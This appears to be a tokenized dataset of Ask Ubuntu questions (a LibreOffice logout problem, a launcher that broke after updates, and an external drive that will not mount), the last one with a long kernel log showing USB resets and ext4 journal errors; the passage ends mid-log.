433256	libreoffice logs me out	each time that i start libreoffice it logs me out of my current session . i am completely new to figuring these things out so any help would be appreciated . thanks in advance . xsession errors : script for ibus started at run_im . script for auto started at run_im . script for default started at run_im . init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd main process ended , respawning init : at-spi2-registryd respawning too fast , stopped
433258	12.04 lts launcher problem	my system has been working fine until yesterday . suddenly my launcher size reverted to the default size and i was no longer able to change it using settings- > appearance ( the option does n't show up ) . also , i can no longer launch multiple instances of apps from the launcher ( for instance , i can launch one xterm window , but not a second . this all changed yesterday , after i installed updates . no other new applications have been added . is there any way to get my system back to the way it was ?
433259	why wo n't my previous hdd mount in 12.04 ?	so after closing the lid one morning and heading out , i come back to my laptop running ubuntu 12.04 , and i 'm booted to the grub menu , being asked to choose which kernel i would like to load . i choose the first option , informs me that i have no kernel loaded . i ca n't go back to a previous version because i never made back ups . now this was after a few days up time , and not sure what updates where made to the kernel , if , at all . so after research , i could n't find any work around to loading my non existent kernel . i 've put that hdd `` hitachi 320gb '' into an enclosure and have it external hooked up to another ubuntu computer via a usb enclosure . it will not mount , and or be read . the enclosure is usb 3.0 if that makes a difference . i get a display message : error mounting : mount : wrong fs type , bad option , bad superblock on /dev/sdb1 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so when i go ahead and input the dmesg/tail , i do n't know what to look for . so how do i make my hard drive mountable and if at all , fix the kernel problem without loosing my data ? [ 4.495359 ] ptp clock support registered [ 4.515264 ] ahci 0000:00:11.0 : version 3.0 [ 4.515693 ] ahci 0000:00:11.0 : ahci 0001.0100 32 slots 4 ports 3 gbps 0xf impl sata mode [ 4.515698 ] ahci 0000:00:11.0 : flags : 64bit ncq sntf ilck led clo pmp pio slum part ccc [ 4.519892 ] scsi0 : ahci [ 4.522002 ] scsi1 : ahci [ 4.522316 ] scsi2 : ahci [ 4.523564 ] tg3.c : v3.132 ( may 21 , 2013 ) [ 4.524580 ] scsi3 : ahci [ 4.524767 ] ata1 : sata max udma/133 abar m1024 @ 0xf0207000 port 0xf0207100 irq 22 [ 4.524771 ] ata2 : sata max udma/133 abar m1024 @ 0xf0207000 port 0xf0207180 irq 22 [ 4.524775 ] ata3 : sata max udma/133 abar m1024 @ 0xf0207000 port 0xf0207200 irq 22 [ 4.524779 ] ata4 : sata max udma/133 abar m1024 @ 0xf0207000 port 0xf0207280 irq 22 [ 4.587188 ] hidraw : raw hid events driver ( c ) jiri kosina [ 4.618268 ] usbcore : registered new interface driver usbhid [ 4.618273 ] usbhid : usb hid core driver [ 4.626224 ] tg3 0000:03:00.0 eth0 : tigon3 [ partno ( bcm95784m ) rev 5784100 ] ( pci express ) mac address 00:1f:16 : b0:8a : f1 [ 4.626232 ] tg3 0000:03:00.0 eth0 : attached phy is 5784 ( 10/100/1000base-t ethernet ) ( wirespeed [ 1 ] , eee [ 0 ] ) [ 4.626235 ] tg3 0000:03:00.0 eth0 : rxcsums [ 1 ] linkchgreg [ 0 ] miirq [ 0 ] asf [ 0 ] tsocap [ 1 ] [ 4.626238 ] tg3 0000:03:00.0 eth0 : dma_rwctrl [ 76180000 ] dma_mask [ 64-bit ] [ 4.646102 ] input : sonix usb device as /devices/pci0000:00/0000:00:13.0/usb5/5-3/5-3:1.0/input/input5 [ 4.646290 ] hid-generic 0003:0c45:0520.0001 : input , hidraw0 : usb hid v1.00 keyboard [ sonix usb device ] on usb-0000:00:13.0-3/input0 [ 4.646871 ] input : sonix usb device as /devices/pci0000:00/0000:00:13.0/usb5/5-3/5-3:1.1/input/input6 [ 4.646998 ] hid-generic 0003:0c45:0520.0002 : input , hidraw1 : usb hid v1.00 mouse [ sonix usb device ] on usb-0000:00:13.0-3/input1 [ 4.848077 ] ata3 : sata link down ( sstatus 0 scontrol 300 ) [ 4.848120 ] ata4 : sata link down ( sstatus 0 scontrol 300 ) [ 5.016061 ] ata1 : softreset failed ( device not ready ) [ 5.016065 ] ata1 : applying pmp srst workaround and retrying [ 5.016081 ] ata2 : softreset failed ( device not ready ) [ 5.016086 ] ata2 : applying pmp srst workaround and retrying [ 5.188071 ] ata2 : sata link up 1.5 gbps ( sstatus 113 scontrol 300 ) [ 5.188101 ] ata1 : sata link up 3.0 gbps ( sstatus 123 scontrol 300 ) [ 5.189878 ] ata2.00 : atapi : slimtype dvd a ds8a3s , ha17 , max udma/100 [ 5.193191 ] ata2.00 : configured for udma/100 [ 5.217293 ] ata1.00 : ata-8 : wdc wd1600bevt-22zct0 , 11.01a11 , max udma/133 [ 5.217297 ] ata1.00 : 312581808 sectors , multi 16 : lba48 ncq ( depth 31/32 ) , aa [ 5.218798 ] ata1.00 : configured for udma/133 [ 5.219111 ] scsi 0:0:0:0 : direct-access ata wdc wd1600bevt-2 11.0 pq : 0 ansi : 5 [ 5.219385 ] sd 0:0:0:0 : attached scsi generic sg0 type 0 [ 5.219469 ] sd 0:0:0:0 : [ sda ] 312581808 512-byte logical blocks : ( 160 gb/149 gib ) [ 5.219551 ] sd 0:0:0:0 : [ sda ] write protect is off [ 5.219555 ] sd 0:0:0:0 : [ sda ] mode sense : 00 3a 00 00 [ 5.219586 ] sd 0:0:0:0 : [ sda ] write cache : enabled , read cache : enabled , does n't support dpo or fua [ 5.222734 ] scsi 1:0:0:0 : cd-rom slimtype dvd a ds8a3s ha17 pq : 0 ansi : 5 [ 5.227470 ] sr0 : scsi3-mmc drive : 24x/8x writer dvd-ram cd/rw xa/form2 cdda pop-up [ 5.227473 ] cdrom : uniform cd-rom driver revision : 3.20 [ 5.227634 ] sr 1:0:0:0 : attached scsi cd-rom sr0 [ 5.227724 ] sr 1:0:0:0 : attached scsi generic sg1 type 5 [ 5.249852 ] sda : sda1 sda2 < sda5 > [ 5.250475 ] sd 0:0:0:0 : [ sda ] attached scsi disk [ 5.512478 ] ext4-fs ( sda1 ) : info : recovery required on readonly filesystem [ 5.512485 ] ext4-fs ( sda1 ) : write access will be enabled during recovery [ 8.774397 ] ext4-fs ( sda1 ) : orphan cleanup on readonly fs [ 8.792401 ] ext4-fs ( sda1 ) : 11 orphan inodes deleted [ 8.792404 ] ext4-fs ( sda1 ) : recovery complete [ 8.937155 ] ext4-fs ( sda1 ) : mounted filesystem with ordered data mode . opts : ( null ) [ 10.098243 ] init : ureadahead main process ( 288 ) terminated with status 5 [ 11.336183 ] adding 3929084k swap on /dev/sda5 . priority : -1 extents:1 across:3929084k fs [ 11.972566 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 12.037273 ] udevd [ 395 ] : starting version 175 [ 12.840094 ] wmi : mapper loaded [ 12.979090 ] shpchp : standard hot plug pci controller driver version : 0.4 [ 13.043822 ] piix4_smbus 0000:00:14.0 : smbus host controller at 0x8040 , revision 0 [ 13.043904 ] piix4_smbus 0000:00:14.0 : auxiliary smbus host controller at 0x8060 [ 13.057134 ] sp5100_tco : sp5100/sb800 tco watchdog timer driver v0.05 [ 13.057250 ] sp5100_tco : pci revision id : 0x3a [ 13.057277 ] sp5100_tco : failed to find mmio address , giving up . [ 13.074419 ] acpi device:24 : registered as cooling_device2 [ 13.074581 ] acpi : video device [ vga1 ] ( multi-head : yes rom : no post : no ) [ 13.074649 ] input : video bus as /devices/lnxsystm:00/device:00/pnp0a08:00/device:21/lnxvideo:01/input/input7 [ 13.321175 ] [ drm ] initialized drm 1.1.0 20060810 [ 13.389520 ] acer_wmi : acer laptop acpi-wmi extras [ 13.411401 ] lp : driver loaded but no devices found [ 13.550704 ] acer_wmi : function bitmap for communication device : 0x3 [ 13.551212 ] acer_wmi : brightness must be controlled by acpi video driver [ 13.551512 ] input : acer bma150 accelerometer as /devices/virtual/input/input8 [ 14.129571 ] cfg80211 : calling crda to update world regulatory domain [ 14.357410 ] hda-intel 0000:00:14.2 : using lpib position fix [ 14.362121 ] hda-intel 0000:00:14.2 : enable sync_write for stable communication [ 14.402660 ] linux video capture interface : v2.00 [ 14.411407 ] [ drm ] radeon kernel modesetting enabled . [ 14.411893 ] [ drm ] initializing kernel modesetting ( rs780 0x1002:0x9612 0x1025:0x021a ) . [ 14.411916 ] [ drm ] register mmio base : 0xcfdf0000 [ 14.411919 ] [ drm ] register mmio size : 65536 [ 14.412107 ] atom bios : acer_sjv50pu [ 14.412144 ] radeon 0000:01:05.0 : vram : 256m 0x00000000c0000000 - 0x00000000cfffffff ( 256m used ) [ 14.412148 ] radeon 0000:01:05.0 : gtt : 512m 0x00000000a0000000 - 0x00000000bfffffff [ 14.412154 ] [ drm ] detected vram ram=256m , bar=256m [ 14.412156 ] [ drm ] ram width 32bits ddr [ 14.412441 ] [ ttm ] zone kernel : available graphics memory : 1894122 kib [ 14.412443 ] [ ttm ] initializing pool allocator [ 14.412450 ] [ ttm ] initializing dma pool allocator [ 14.412488 ] [ drm ] radeon : 256m of vram memory ready [ 14.412491 ] [ drm ] radeon : 512m of gtt memory ready . [ 14.412518 ] [ drm ] gart : num cpu pages 131072 , num gpu pages 131072 [ 14.430875 ] [ drm ] loading rs780 microcode [ 14.475328 ] hda_codec : cx20561 ( hermosa ) : bios auto-probing . [ 14.475864 ] autoconfig : line_outs=1 ( 0x1a/0x0/0x0/0x0/0x0 ) type : speaker [ 14.475877 ] speaker_outs=0 ( 0x0/0x0/0x0/0x0/0x0 ) [ 14.475879 ] hp_outs=1 ( 0x16/0x0/0x0/0x0/0x0 ) [ 14.475880 ] mono : mono_out=0x0 [ 14.475882 ] dig-out=0x1c/0x0 [ 14.475883 ] inputs : [ 14.475886 ] internal mic=0x1d [ 14.475888 ] mic=0x18 [ 14.480063 ] autoconfig : line_outs=0 ( 0x0/0x0/0x0/0x0/0x0 ) type : line [ 14.480070 ] speaker_outs=0 ( 0x0/0x0/0x0/0x0/0x0 ) [ 14.480072 ] hp_outs=0 ( 0x0/0x0/0x0/0x0/0x0 ) [ 14.480074 ] mono : mono_out=0x0 [ 14.480076 ] inputs : [ 14.482632 ] input : hda ati sb headphone as /devices/pci0000:00/0000:00:14.2/sound/card0/input9 [ 14.482758 ] input : hda ati sb mic as /devices/pci0000:00/0000:00:14.2/sound/card0/input10 [ 14.696898 ] uvcvideo : found uvc 1.00 device video webcam ( 064e : a103 ) [ 14.713702 ] input : video webcam as /devices/pci0000:00/0000:00:13.2/usb2/2-5/2-5:1.0/input/input11 [ 14.714454 ] usbcore : registered new interface driver uvcvideo [ 14.714459 ] usb video class driver ( 1.1.1 ) [ 14.815309 ] [ drm ] pcie gart of 512m enabled ( table at 0x00000000c0040000 ) . [ 14.815485 ] radeon 0000:01:05.0 : wb enabled [ 14.815490 ] radeon 0000:01:05.0 : fence driver on ring 0 use gpu addr 0x00000000a0000c00 and cpu addr 0xffff88012fcccc00 [ 14.815494 ] radeon 0000:01:05.0 : fence driver on ring 3 use gpu addr 0x00000000a0000c0c and cpu addr 0xffff88012fcccc0c [ 14.815498 ] [ drm ] supports vblank timestamp caching rev 1 ( 10.10.2010 ) . [ 14.815499 ] [ drm ] driver supports precise vblank timestamp query . [ 14.815524 ] [ drm ] radeon : irq initialized . [ 14.815973 ] radeon 0000:01:05.0 : setting latency timer to 64 [ 14.849245 ] [ drm ] ring test on 0 succeeded in 1 usecs [ 14.849325 ] [ drm ] ring test on 3 succeeded in 1 usecs [ 14.850136 ] [ drm ] ib test on ring 0 succeeded in 0 usecs [ 14.850160 ] [ drm ] ib test on ring 3 succeeded in 0 usecs [ 14.850729 ] [ drm ] radeon display connectors [ 14.850735 ] [ drm ] connector 0 : [ 14.850737 ] [ drm ] lvds-1 [ 14.850740 ] [ drm ] ddc : 0x7e50 0x7e50 0x7e54 0x7e54 0x7e58 0x7e58 0x7e5c 0x7e5c [ 14.850742 ] [ drm ] encoders : [ 14.850743 ] [ drm ] lcd1 : internal_kldscp_lvtma [ 14.850745 ] [ drm ] connector 1 : [ 14.850746 ] [ drm ] vga-1 [ 14.850749 ] [ drm ] ddc : 0x7e40 0x7e40 0x7e44 0x7e44 0x7e48 0x7e48 0x7e4c 0x7e4c [ 14.850750 ] [ drm ] encoders : [ 14.850752 ] [ drm ] crt1 : internal_kldscp_dac1 [ 14.850753 ] [ drm ] connector 2 : [ 14.850755 ] [ drm ] hdmi-a-1 [ 14.850756 ] [ drm ] hpd1 [ 14.850758 ] [ drm ] ddc : 0x7e60 0x7e60 0x7e64 0x7e64 0x7e68 0x7e68 0x7e6c 0x7e6c [ 14.850760 ] [ drm ] encoders : [ 14.850761 ] [ drm ] dfp1 : internal_uniphy [ 14.850930 ] [ drm ] radeon : power management initialized [ 15.051896 ] type=1400 audit ( 1394915437.611:2 ) : apparmor= '' status '' operation= '' profile_load '' parent=664 profile= '' unconfined '' name= '' /sbin/dhclient '' pid=680 comm= '' apparmor_parser '' [ 15.051909 ] type=1400 audit ( 1394915437.611:3 ) : apparmor= '' status '' operation= '' profile_load '' parent=664 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=680 comm= '' apparmor_parser '' [ 15.051916 ] type=1400 audit ( 1394915437.611:4 ) : apparmor= '' status '' operation= '' profile_load '' parent=664 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=680 comm= '' apparmor_parser '' [ 15.051943 ] type=1400 audit ( 1394915437.611:5 ) : apparmor= '' status '' operation= '' profile_replace '' parent=742 profile= '' unconfined '' name= '' /sbin/dhclient '' pid=743 comm= '' apparmor_parser '' [ 15.051960 ] type=1400 audit ( 1394915437.611:6 ) : apparmor= '' status '' operation= '' profile_replace '' parent=742 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=743 comm= '' apparmor_parser '' [ 15.051966 ] type=1400 audit ( 1394915437.611:7 ) : apparmor= '' status '' operation= '' profile_replace '' parent=742 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=743 comm= '' apparmor_parser '' [ 15.052708 ] type=1400 audit ( 1394915437.615:8 ) : apparmor= '' status '' operation= '' profile_replace '' parent=664 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=680 comm= '' apparmor_parser '' [ 15.052718 ] type=1400 audit ( 1394915437.615:9 ) : apparmor= '' status '' operation= '' profile_replace '' parent=664 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=680 comm= '' apparmor_parser '' [ 15.052760 ] type=1400 audit ( 1394915437.615:10 ) : apparmor= '' status '' operation= '' profile_replace '' parent=742 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=743 comm= '' apparmor_parser '' [ 15.052767 ] type=1400 audit ( 1394915437.615:11 ) : apparmor= '' status '' operation= '' profile_replace '' parent=742 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=743 comm= '' apparmor_parser '' [ 15.106051 ] cfg80211 : world regulatory domain updated : [ 15.106060 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 15.106063 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 15.106065 ] cfg80211 : ( 2457000 khz - 2482000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 15.106067 ] cfg80211 : ( 2474000 khz - 2494000 khz @ 20000 khz ) , ( 300 mbi , 2000 mbm ) [ 15.106069 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 15.106071 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 15.713886 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro [ 15.831470 ] ath : eeprom regdomain : 0x60 [ 15.831477 ] ath : eeprom indicates we should expect a direct regpair map [ 15.831482 ] ath : country alpha2 being used : 00 [ 15.831484 ] ath : regpair used : 0x60 [ 15.858879 ] [ drm ] fb mappable at 0xd0142000 [ 15.858886 ] [ drm ] vram apper at 0xd0000000 [ 15.858887 ] [ drm ] size 4325376 [ 15.858889 ] [ drm ] fb depth is 24 [ 15.858891 ] [ drm ] pitch is 5632 [ 15.859135 ] fbcon : radeondrmfb ( fb0 ) is primary device [ 15.912208 ] console : switching to colour frame buffer device 170x48 [ 15.929637 ] ieee80211 phy0 : selected rate control algorithm 'minstrel_ht' [ 15.930265 ] ieee80211 phy0 : atheros ar9280 rev:2 mem=0xffffc90001820000 , irq=18 [ 15.930605 ] radeon 0000:01:05.0 : fb0 : radeondrmfb frame buffer device [ 15.930608 ] radeon 0000:01:05.0 : registered panic notifier [ 15.930816 ] [ drm ] initialized radeon 2.34.0 20080528 for 0000:01:05.0 on minor 0 [ 15.930941 ] hda-intel 0000:01:05.1 : using lpib position fix [ 15.930987 ] snd_hda_intel 0000:01:05.1 : setting latency timer to 64 [ 15.939216 ] hda-intel 0000:01:05.1 : enable sync_write for stable communication [ 16.022522 ] input : hda ati hdmi hdmi/dp , pcm=3 as /devices/pci0000:00/0000:00:01.0/0000:01:05.1/sound/card1/input12 [ 16.287277 ] init : failsafe main process ( 852 ) killed by term signal [ 18.296419 ] ppdev : user-space parallel port driver [ 19.951626 ] bluetooth : core ver 2.16 [ 19.951664 ] net : registered protocol family 31 [ 19.951666 ] bluetooth : hci device and connection manager initialized [ 19.951681 ] bluetooth : hci socket layer initialized [ 19.951685 ] bluetooth : l2cap socket layer initialized [ 19.951692 ] bluetooth : sco socket layer initialized [ 20.148933 ] audit_printk_skb : 15 callbacks suppressed [ 20.148941 ] type=1400 audit ( 1394915442.711:17 ) : apparmor= '' status '' operation= '' profile_replace '' parent=981 profile= '' unconfined '' name= '' /sbin/dhclient '' pid=990 comm= '' apparmor_parser '' [ 20.148954 ] type=1400 audit ( 1394915442.711:18 ) : apparmor= '' status '' operation= '' profile_replace '' parent=981 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=990 comm= '' apparmor_parser '' [ 20.148961 ] type=1400 audit ( 1394915442.711:19 ) : apparmor= '' status '' operation= '' profile_replace '' parent=981 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=990 comm= '' apparmor_parser '' [ 20.149684 ] type=1400 audit ( 1394915442.711:20 ) : apparmor= '' status '' operation= '' profile_replace '' parent=981 profile= '' unconfined '' name= '' /usr/lib/networkmanager/nm-dhcp-client.action '' pid=990 comm= '' apparmor_parser '' [ 20.149691 ] type=1400 audit ( 1394915442.711:21 ) : apparmor= '' status '' operation= '' profile_replace '' parent=981 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=990 comm= '' apparmor_parser '' [ 20.150072 ] type=1400 audit ( 1394915442.711:22 ) : apparmor= '' status '' operation= '' profile_replace '' parent=981 profile= '' unconfined '' name= '' /usr/lib/connman/scripts/dhclient-script '' pid=990 comm= '' apparmor_parser '' [ 20.225061 ] type=1400 audit ( 1394915442.787:23 ) : apparmor= '' status '' operation= '' profile_load '' parent=981 profile= '' unconfined '' name= '' /usr/lib/lightdm/lightdm/lightdm-guest-session-wrapper '' pid=989 comm= '' apparmor_parser '' [ 20.225076 ] type=1400 audit ( 1394915442.787:24 ) : apparmor= '' status '' operation= '' profile_load '' parent=981 profile= '' unconfined '' name= '' chromium_browser '' pid=989 comm= '' apparmor_parser '' [ 20.225625 ] type=1400 audit ( 1394915442.787:25 ) : apparmor= '' status '' operation= '' profile_replace '' parent=981 profile= '' unconfined '' name= '' chromium_browser '' pid=989 comm= '' apparmor_parser '' [ 20.267912 ] type=1400 audit ( 1394915442.831:26 ) : apparmor= '' status '' operation= '' profile_load '' parent=981 profile= '' unconfined '' name= '' /usr/lib/telepathy/mission-control-5 '' pid=995 comm= '' apparmor_parser '' [ 20.375524 ] bluetooth : bnep ( ethernet emulation ) ver 1.3 [ 20.375530 ] bluetooth : bnep filters : protocol multicast [ 20.375544 ] bluetooth : bnep socket layer initialized [ 20.585435 ] bluetooth : rfcomm tty layer initialized [ 20.585458 ] bluetooth : rfcomm socket layer initialized [ 20.585460 ] bluetooth : rfcomm ver 1.11 [ 20.961008 ] tg3 0000:03:00.0 : irq 43 for msi/msi-x [ 21.084183 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 21.084629 ] ipv6 : addrconf ( netdev_up ) : eth0 : link is not ready [ 21.102993 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 21.103869 ] ipv6 : addrconf ( netdev_up ) : wlan0 : link is not ready [ 24.497501 ] wlan0 : authenticate with 00:18:0a:03:2a : ec [ 24.520325 ] wlan0 : send auth to 00:18:0a:03:2a : ec ( try 1/3 ) [ 24.529994 ] wlan0 : authenticated [ 24.532142 ] wlan0 : associate with 00:18:0a:03:2a : ec ( try 1/3 ) [ 24.552908 ] wlan0 : rx assocresp from 00:18:0a:03:2a : ec ( capab=0x421 status=0 aid=4 ) [ 24.552977 ] wlan0 : associated [ 24.553025 ] ipv6 : addrconf ( netdev_change ) : wlan0 : link becomes ready [ 24.553107 ] cfg80211 : calling crda for country : us [ 24.560765 ] ath : regdomain 0x8348 updated by countryie [ 24.560773 ] ath : eeprom regdomain : 0x8348 [ 24.560775 ] ath : eeprom indicates we should expect a country code [ 24.560778 ] ath : doing eeprom country- > regdmn map search [ 24.560779 ] ath : country maps to regdmn code : 0x3a [ 24.560781 ] ath : country alpha2 being used : us [ 24.560783 ] ath : regpair used : 0x3a [ 24.560829 ] cfg80211 : regulatory domain changed to country : us [ 24.560830 ] cfg80211 : ( start_freq - end_freq @ bandwidth ) , ( max_antenna_gain , max_eirp ) [ 24.560833 ] cfg80211 : ( 2402000 khz - 2472000 khz @ 40000 khz ) , ( 300 mbi , 2700 mbm ) [ 24.560835 ] cfg80211 : ( 5170000 khz - 5250000 khz @ 40000 khz ) , ( 300 mbi , 1700 mbm ) [ 24.560837 ] cfg80211 : ( 5250000 khz - 5330000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 24.560839 ] cfg80211 : ( 5490000 khz - 5600000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 24.560841 ] cfg80211 : ( 5650000 khz - 5710000 khz @ 40000 khz ) , ( 300 mbi , 2000 mbm ) [ 24.560843 ] cfg80211 : ( 5735000 khz - 5835000 khz @ 40000 khz ) , ( 300 mbi , 3000 mbm ) [ 24.618150 ] wlan0 : limiting tx power to 27 ( 27 - 0 ) dbm as advertised by 00:18:0a:03:2a : ec [ 47.668066 ] usb 2-1 : new high-speed usb device number 4 using ehci-pci [ 48.219903 ] audit_printk_skb : 126 callbacks suppressed [ 48.219912 ] type=1400 audit ( 1394915470.103:69 ) : apparmor= '' denied '' operation= '' open '' parent=1 profile= '' /usr/lib/telepathy/mission-control-5 '' name= '' /usr/share/gvfs/remote-volume-monitors/ '' pid=2530 comm= '' mission-control '' requested_mask= '' r '' denied_mask= '' r '' fsuid=1000 ouid=0 [ 49.547499 ] usb 2-1 : new usb device found , idvendor=174c , idproduct=5106 [ 49.547507 ] usb 2-1 : new usb device strings : mfr=2 , product=3 , serialnumber=1 [ 49.547511 ] usb 2-1 : product : as2105 [ 49.547513 ] usb 2-1 : manufacturer : asmedia [ 49.547516 ] usb 2-1 : serialnumber : 090704pb5c00qdhmtgtg [ 49.721511 ] usb-storage 2-1:1.0 : usb mass storage device detected [ 49.721782 ] scsi4 : usb-storage 2-1:1.0 [ 49.721910 ] usbcore : registered new interface driver usb-storage [ 50.736382 ] scsi 4:0:0:0 : direct-access as2105 pb3o pq : 0 ansi : 5 [ 50.740084 ] sd 4:0:0:0 : attached scsi generic sg2 type 0 [ 50.741090 ] sd 4:0:0:0 : [ sdb ] 625142448 512-byte logical blocks : ( 320 gb/298 gib ) [ 50.742215 ] sd 4:0:0:0 : [ sdb ] write protect is off [ 50.742222 ] sd 4:0:0:0 : [ sdb ] mode sense : 23 00 00 00 [ 50.743233 ] sd 4:0:0:0 : [ sdb ] no caching mode page found [ 50.743242 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 50.748752 ] sd 4:0:0:0 : [ sdb ] no caching mode page found [ 50.748762 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 50.795857 ] sdb : sdb1 sdb2 < sdb5 > [ 50.799974 ] sd 4:0:0:0 : [ sdb ] no caching mode page found [ 50.799984 ] sd 4:0:0:0 : [ sdb ] assuming drive cache : write through [ 50.800056 ] sd 4:0:0:0 : [ sdb ] attached scsi disk [ 83.024148 ] usb 2-1 : reset high-speed usb device number 4 using ehci-pci [ 114.000109 ] usb 2-1 : reset high-speed usb device number 4 using ehci-pci [ 144.976126 ] usb 2-1 : reset high-speed usb device number 4 using ehci-pci [ 175.952092 ] usb 2-1 : reset high-speed usb device number 4 using ehci-pci [ 176.117367 ] sd 4:0:0:0 : [ sdb ] unhandled error code [ 176.117380 ] sd 4:0:0:0 : [ sdb ] [ 176.117385 ] result : hostbyte=did_abort driverbyte=driver_ok [ 176.117391 ] sd 4:0:0:0 : [ sdb ] cdb : [ 176.117395 ] read ( 10 ) : 28 00 12 47 20 f0 00 00 f0 00 [ 176.117413 ] end_request : i/o error , dev sdb , sector 306651376 [ 176.117491 ] jbd2 : failed to read block at offset 25374 [ 176.117512 ] jbd2 : recovery failed [ 176.117518 ] ext4-fs ( sdb1 ) : error loading journal [ 217.519741 ] atkbd serio0 : unknown key pressed ( translated set 2 , code 0xf8 on isa0060/serio0 ) . [ 217.519750 ] atkbd serio0 : use 'setkeycodes e078 < keycode > ' to make it known . [ 217.526684 ] atkbd serio0 : unknown key released ( translated set 2 , code 0xf8 on isa0060/serio0 ) . [ 217.526692 ] atkbd serio0 : use 'setkeycodes e078 < keycode > ' to make it known . [ 498.000121 ] usb 2-1 : reset high-speed usb device number 4 using ehci-pci [ 528.976107 ] usb 2-1 : reset high-speed usb device number 4 using ehci-pci [ 559.952072 ] usb 2-1 : reset high-speed usb device number 4 using ehci-pci [ 569.378305 ] atkbd serio0 : unknown key pressed ( translated set 2 , code 0xf8 on isa0060/serio0 ) . [ 569.378318 ] atkbd serio0 : use 'setkeycodes e078 < keycode > ' to make it known . [ 569.384501 ] atkbd serio0 : unknown key released ( translated set 2 , code 0xf8 on isa0060/serio0 ) . [ 569.384510 ] atkbd serio0 : use 'setkeycodes e078 < keycode > ' to make it known . [ 590.992096 ] usb 2-1 : reset high-speed usb device number 4 using ehci-pci [ 591.157592 ] sd 4:0:0:0 : [ sdb ] unhandled error code [ 591.157602 ] sd 4:0:0:0 : [ sdb ] [ 591.157605 ] result : hostbyte=did_abort driverbyte=driver_ok [ 591.157608 ] sd 4:0:0:0 : [ sdb ] cdb : [ 591.157610 ] read ( 10 ) : 28 00 12 47 20 f0 00 00 f0 00 [ 591.157621 ] end_request : i/o error , dev sdb , sector 306651376 [ 591.157663 ] jbd2 : failed to read block at offset 25374 [ 591.157695 ] jbd2 : recovery failed [ 591.157704 ] ext4-fs ( sdb1 ) : error loading journal [ 596.171325 ] usb 2-1 : usb disconnect , device number 4 [ 600.672137 ] usb 2-1 : new high-speed usb device number 5 using ehci-pci [ 602.077677 ] usb 2-1 : new usb device found , idvendor=174c , idproduct=5106 [ 602.077685 ] usb 2-1 : new usb device strings : mfr=2 , product=3 , serialnumber=1 [ 602.077688 ] usb 2-1 : product : as2105 [ 602.077691 ] usb 2-1 : manufacturer : asmedia [ 602.077693 ] usb 2-1 : serialnumber : 090704pb5c00qdhmtgtg [ 602.078499 ] usb-storage 2-1:1.0 : usb mass storage device detected [ 602.082713 ] scsi5 : usb-storage 2-1:1.0 [ 603.099829 ] scsi 5:0:0:0 : direct-access as2105 pb3o pq : 0 ansi : 5 [ 603.102438 ] sd 5:0:0:0 : attached scsi generic sg2 type 0 [ 603.105326 ] sd 5:0:0:0 : [ sdb ] 625142448 512-byte logical blocks : ( 320 gb/298 gib ) [ 603.106448 ] sd 5:0:0:0 : [ sdb ] write protect is off [ 603.106457 ] sd 5:0:0:0 : [ sdb ] mode sense : 23 00 00 00 [ 603.108723 ] sd 5:0:0:0 : [ sdb ] no caching mode page found [ 603.108735 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 603.113560 ] sd 5:0:0:0 : [ sdb ] no caching mode page found [ 603.113569 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 603.159311 ] sdb : sdb1 sdb2 < sdb5 > [ 603.166569 ] sd 5:0:0:0 : [ sdb ] no caching mode page found [ 603.166585 ] sd 5:0:0:0 : [ sdb ] assuming drive cache : write through [ 603.166595 ] sd 5:0:0:0 : [ sdb ] attached scsi disk [ 628.949555 ] atkbd serio0 : unknown key pressed ( translated set 2 , code 0xf8 on isa0060/serio0 ) . [ 628.949568 ] atkbd serio0 : use 'setkeycodes e078 < keycode > ' to make it known . [ 628.955978 ] atkbd serio0 : unknown key released ( translated set 2 , code 0xf8 on isa0060/serio0 ) . [ 628.955991 ] atkbd serio0 : use 'setkeycodes e078 < keycode > ' to make it known . [ 634.960087 ] usb 2-1 : reset high-speed usb device number 5 using ehci-pci [ 665.936118 ] usb 2-1 : reset high-speed usb device number 5 using ehci-pci [ 696.976116 ] usb 2-1 : reset high-speed usb device number 5 using ehci-pci [ 728.016096 ] usb 2-1 : reset high-speed usb device number 5 using ehci-pci [ 728.181741 ] sd 5:0:0:0 : [ sdb ] unhandled error code [ 728.181750 ] sd 5:0:0:0 : [ sdb ] [ 728.181753 ] result : hostbyte=did_abort 